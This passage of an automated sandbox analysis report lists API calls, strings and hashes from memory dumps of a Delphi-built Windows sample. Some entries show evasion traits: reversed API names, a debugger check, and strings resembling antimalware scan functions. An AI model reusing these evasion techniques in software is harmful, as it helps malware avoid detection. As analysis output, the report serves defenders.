                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                • API String ID: 667068680-2233174745
                • Opcode ID: feb0b3afd968c9d010700c34b03bae68e16dc380f1c317b6a6184eb058d6d739
                • Instruction ID: 8d9169fdc85fd38bfac31084365053bb3092be01e951758466e7002db18e8e0d
                • Opcode Fuzzy Hash: feb0b3afd968c9d010700c34b03bae68e16dc380f1c317b6a6184eb058d6d739
                • Instruction Fuzzy Hash: 96F04CADA85BB17EB3107F78BD858372B5DAE60F443105825B402E5A43FB7DC4644FA2
                APIs
                • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028628CE
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: Message
                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                • API String ID: 2030045667-32948583
                • Opcode ID: f9b11d11519eb44e48b3ae5a19f804443f94af94026c05226001e82b3338d9d6
                • Instruction ID: 9a2bca898fdaa24e793f7740af5e7165fdecb3f461c5daed09943e2663bff54a
                • Opcode Fuzzy Hash: f9b11d11519eb44e48b3ae5a19f804443f94af94026c05226001e82b3338d9d6
                • Instruction Fuzzy Hash: 06A1F73CB042588BDB219A2CCC88BB876E5EB08354F1441E5DD4DDB38ACF759989CF52
                Strings
                • bytes: , xrefs: 0286275D
                • The unexpected small block leaks are:, xrefs: 02862707
                • , xrefs: 02862814
                • Unexpected Memory Leak, xrefs: 028628C0
                • 7, xrefs: 028626A1
                • An unexpected memory leak has occurred. , xrefs: 02862690
                • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02862849
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID:
                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                • API String ID: 0-2723507874
                • Opcode ID: afa46a981a5963ab2e8224af5d534ef04fad37b5d1f93dfa363b959df8dfb212
                • Instruction ID: 2e96faa5ddab4b320c9074e73b3b109e21aea169f6c84bf842475706b52ed276
                • Opcode Fuzzy Hash: afa46a981a5963ab2e8224af5d534ef04fad37b5d1f93dfa363b959df8dfb212
                • Instruction Fuzzy Hash: 2171C43CB042988FDB219A2CCC88BE8BAE5EB09714F1041E5D94DDB28ADF7549C5CF52
                APIs
                • GetThreadLocale.KERNEL32(00000000,0286C00B,?,?,00000000,00000000), ref: 0286BD76
                  • Part of subcall function 0286A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0286A762
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: Locale$InfoThread
                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                • API String ID: 4232894706-2493093252
                • Opcode ID: 8431aa41beafa167dada8ae7a7046f188bea84163ebe1b365f3507d6c2676296
                • Instruction ID: bbf2789ee7d6923a7f50353fdc72cba06c9dfa5753c81dedf4a982a1facc0878
                • Opcode Fuzzy Hash: 8431aa41beafa167dada8ae7a7046f188bea84163ebe1b365f3507d6c2676296
                • Instruction Fuzzy Hash: 8261643C7041489BDB04EBA8D89CBBF77B7DB48704F209436D241EB746CA79D9099B52
                APIs
                • IsBadReadPtr.KERNEL32(?,00000004), ref: 0287AE38
                • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0287AE4F
                • IsBadReadPtr.KERNEL32(?,00000004), ref: 0287AEE3
                • IsBadReadPtr.KERNEL32(?,00000002), ref: 0287AEEF
                • IsBadReadPtr.KERNEL32(?,00000014), ref: 0287AF03
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: Read$HandleModule
                • String ID: KernelBase$LoadLibraryExA
                • API String ID: 2226866862-113032527
                • Opcode ID: a042d141bd142f1ecbc28a02f189aa68596bfd0ffb02a909c63c22b8e94aa4ca
                • Instruction ID: bc92e7eb268f77d507c2aab2c9208d17d51c4be6678f8fe6a4e65e87c7aaf208
                • Opcode Fuzzy Hash: a042d141bd142f1ecbc28a02f189aa68596bfd0ffb02a909c63c22b8e94aa4ca
                • Instruction Fuzzy Hash: 6E3142BEA40205BBEB14DF68DC85F6E77A8AF04768F044510FA58DB2C1D774E940DBA1
                APIs
                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028643F3,?,?,028C17C8,?,?,0288E7A8,0286655D,0288D30D), ref: 02864365
                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028643F3,?,?,028C17C8,?,?,0288E7A8,0286655D,0288D30D), ref: 0286436B
                • GetStdHandle.KERNEL32(000000F5,028643B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028643F3,?,?,028C17C8), ref: 02864380
                • WriteFile.KERNEL32(00000000,000000F5,028643B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028643F3,?,?), ref: 02864386
                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028643A4
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: FileHandleWrite$Message
                • String ID: Error$Runtime error at 00000000
                • API String ID: 1570097196-2970929446
                • Opcode ID: e302e004538f57097b5c1e8a097d643e424ee300a1acad0ddab19fa5222baf5c
                • Instruction ID: d843b950ab05ea08d9469f116307e7b2bc0c0fcb60c003487c7710b42f8df397
                • Opcode Fuzzy Hash: e302e004538f57097b5c1e8a097d643e424ee300a1acad0ddab19fa5222baf5c
                • Instruction Fuzzy Hash: B0F0B46DEC434479FA22B668AD0DFBD275C5755F10F1C4A09B338E86C287E450C49B67
                APIs
                  • Part of subcall function 0286ACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0286ACD9
                  • Part of subcall function 0286ACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0286ACFD
                  • Part of subcall function 0286ACBC: GetModuleFileNameA.KERNEL32(02860000,?,00000105), ref: 0286AD18
                  • Part of subcall function 0286ACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0286ADAE
                • CharToOemA.USER32(?,?), ref: 0286AE7B
                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0286AE98
                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0286AE9E
                • GetStdHandle.KERNEL32(000000F4,0286AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0286AEB3
                • WriteFile.KERNEL32(00000000,000000F4,0286AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0286AEB9
                • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0286AEDB
                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0286AEF1
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                • String ID:
                • API String ID: 185507032-0
                • Opcode ID: 5d1548b206bd1927e862b9e305dbe7265f17ecca7e1ddf344bfd519ba0380f3e
                • Instruction ID: 61aa2a87aacb9ca17599a142cc26e5874abc05b6b28c18a9229cf91bbf000dc1
                • Opcode Fuzzy Hash: 5d1548b206bd1927e862b9e305dbe7265f17ecca7e1ddf344bfd519ba0380f3e
                • Instruction Fuzzy Hash: B31173BE5442447ED300EB98DC89FAB77EEAB44300F404929B754D61D1EB74E5448BA7
                APIs
                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0286E5A5
                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0286E5C1
                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0286E5FA
                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0286E677
                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0286E690
                • VariantCopy.OLEAUT32(?,00000000), ref: 0286E6C5
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                • String ID:
                • API String ID: 351091851-0
                • Opcode ID: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
                • Instruction ID: f2fb26ab49be593df9e9094891b431944ad01cd08a13393f0618516854709248
                • Opcode Fuzzy Hash: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
                • Instruction Fuzzy Hash: 0751EB7DA006299BCB22DB59CD88BE9B3BDAF4D304F0441D5E509E7201DB70AF858F61
                APIs
                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0286358A
                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028635D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028635BD
                • RegCloseKey.ADVAPI32(?,028635E0,00000000,?,00000004,00000000,028635D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028635D3
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                • API String ID: 3677997916-4173385793
                • Opcode ID: 228be1b59258a1810aa0a5856b3590d060aa436327f61454a110c9352e81ed0f
                • Instruction ID: b6ce74996fbfa0dbe78b3be9a9745bd92f2dbf297efc6e381ea5a18de343c1ff
                • Opcode Fuzzy Hash: 228be1b59258a1810aa0a5856b3590d060aa436327f61454a110c9352e81ed0f
                • Instruction Fuzzy Hash: E701D87D940308BAF711DB94DD0ABBD77ECE708B10F1005A2FA04D7780E674A610DB59
                APIs
                • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02878148,?,?,00000000,00000000,?,02878061,00000000,KernelBASE,00000000,00000000,02878088), ref: 0287810D
                • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02878113
                • GetProcAddress.KERNEL32(?,?), ref: 02878125
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: Kernel32$sserddAcorPteG
                • API String ID: 667068680-1372893251
                • Opcode ID: d6b8f5ab4ce644111a0037a08d1351bd7ef66914e40b47f52598cb428f4021a7
                • Instruction ID: 9308d8af3f26136929d2234dd188d73451494575bb9e404a3d53c1da2a2e4ade
                • Opcode Fuzzy Hash: d6b8f5ab4ce644111a0037a08d1351bd7ef66914e40b47f52598cb428f4021a7
                • Instruction Fuzzy Hash: DE01623DA40308AFE711EFB8DC49E6EB7AEEB49710F518864F900D7790DB74E9009A21
                APIs
                • GetThreadLocale.KERNEL32(?,00000000,0286AA67,?,?,00000000), ref: 0286A9E8
                  • Part of subcall function 0286A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0286A762
                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0286AA67,?,?,00000000), ref: 0286AA18
                • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 0286AA23
                • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0286AA67,?,?,00000000), ref: 0286AA41
                • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 0286AA4C
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: Locale$InfoThread$CalendarEnum
                • String ID:
                • API String ID: 4102113445-0
                • Opcode ID: 1a6a86878f91e9fb803acd524db950968002203b368db6722e298d8e3b57c8e2
                • Instruction ID: ee2fee09686ce6111792c0d013276f860a84a42f6c03db873509e1a66faadf10
                • Opcode Fuzzy Hash: 1a6a86878f91e9fb803acd524db950968002203b368db6722e298d8e3b57c8e2
                • Instruction Fuzzy Hash: C701473C2402943BF706AA688C1EF7E335ECB42710FA00121F210F6B80E6699E104A66
                APIs
                • GetThreadLocale.KERNEL32(?,00000000,0286AC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0286AAAF
                  • Part of subcall function 0286A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0286A762
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: Locale$InfoThread
                • String ID: eeee$ggg$yyyy
                • API String ID: 4232894706-1253427255
                • Opcode ID: 36bb68849872e773cf61a630770226761048f0df95cca494025e0ff345aad357
                • Instruction ID: 17c41a3962d780cdb8a67f62a959c7a49c5dc3451c1257ec5f41e0123f40ef50
                • Opcode Fuzzy Hash: 36bb68849872e773cf61a630770226761048f0df95cca494025e0ff345aad357
                • Instruction Fuzzy Hash: CE41F53C3041094BE72EEB6C888C77EB3EBDB85304B504526D566E7344EA79ED059A22
                APIs
                • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02878088,?,?,00000000,?,028779FE,ntdll,00000000,00000000,02877A43,?,?,00000000), ref: 02878056
                  • Part of subcall function 028780C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02878148,?,?,00000000,00000000,?,02878061,00000000,KernelBASE,00000000,00000000,02878088), ref: 0287810D
                  • Part of subcall function 028780C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02878113
                  • Part of subcall function 028780C0: GetProcAddress.KERNEL32(?,?), ref: 02878125
                • GetModuleHandleA.KERNELBASE(?), ref: 0287806A
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: HandleModule$AddressProc
                • String ID: AeldnaHeludoMteG$KernelBASE
                • API String ID: 1883125708-1952140341
                • Opcode ID: 00aa40eb34c30d8240666213450e1b9547b04b411f10f1b9379ce58141f371a3
                • Instruction ID: c353174112b7962c3cbe236f0b3af94d7eb6d4fe8a0ba0e41f0f56b763d7ad9e
                • Opcode Fuzzy Hash: 00aa40eb34c30d8240666213450e1b9547b04b411f10f1b9379ce58141f371a3
                • Instruction Fuzzy Hash: BDF0967C640304AFE710EFB8DC49A6E77ADF749B007614520F900D3650DB78ED04EA56
                APIs
                • GetModuleHandleW.KERNEL32(KernelBase,?,0287F3CC,UacInitialize,028C237C,0288B40C,UacScan,028C237C,0288B40C,ScanBuffer,028C237C,0288B40C,OpenSession,028C237C,0288B40C,ScanString), ref: 0287EFCE
                • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0287EFE0
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: IsDebuggerPresent$KernelBase
                • API String ID: 1646373207-2367923768
                • Opcode ID: ced10459ee67a5689e490b6149232618f9bbf0fdb1f0bddc6580ae6ce693ab1b
                • Instruction ID: cdcb301992db16e1b9d268563d341cfd189b82889388b879b8967343e27ade01
                • Opcode Fuzzy Hash: ced10459ee67a5689e490b6149232618f9bbf0fdb1f0bddc6580ae6ce693ab1b
                • Instruction Fuzzy Hash: 93D0126E3557B01DB50036F82CC882D024C8B555297201EA0B126E5AD3F66FC8511111
                APIs
                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0288D10B,00000000,0288D11E), ref: 0286C3FA
                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0286C40B
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                • API String ID: 1646373207-3712701948
                • Opcode ID: 8d2e00f1107fe12db3eae5496845f399201dd91f022552f419708de2653e46e1
                • Instruction ID: 4cae4b8b1d7c7cc4abb33c5a180dfc9e918cc1aaa97e923b348dfb43b68acdc6
                • Opcode Fuzzy Hash: 8d2e00f1107fe12db3eae5496845f399201dd91f022552f419708de2653e46e1
                • Instruction Fuzzy Hash: DAD05E6CA403506EF700EBB96C8E63A26889714306F00D826F045D5A42E7A984148F90
                APIs
                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0286E217
                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0286E233
                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0286E2AA
                • VariantClear.OLEAUT32(?), ref: 0286E2D3
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: ArraySafe$Bound$ClearIndexVariant
                • String ID:
                • API String ID: 920484758-0
                • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                • Instruction ID: 4b9134c19573e598d14f356c1d82ecb688aef4634d98b89582ac8e05af85fe37
                • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                • Instruction Fuzzy Hash: A641F87DA002299FCB61DB59CC98FE9B3BEAB49604F0041D5EA49E7211DA70AF848F51
                APIs
                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0286ACD9
                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0286ACFD
                • GetModuleFileNameA.KERNEL32(02860000,?,00000105), ref: 0286AD18
                • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0286ADAE
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
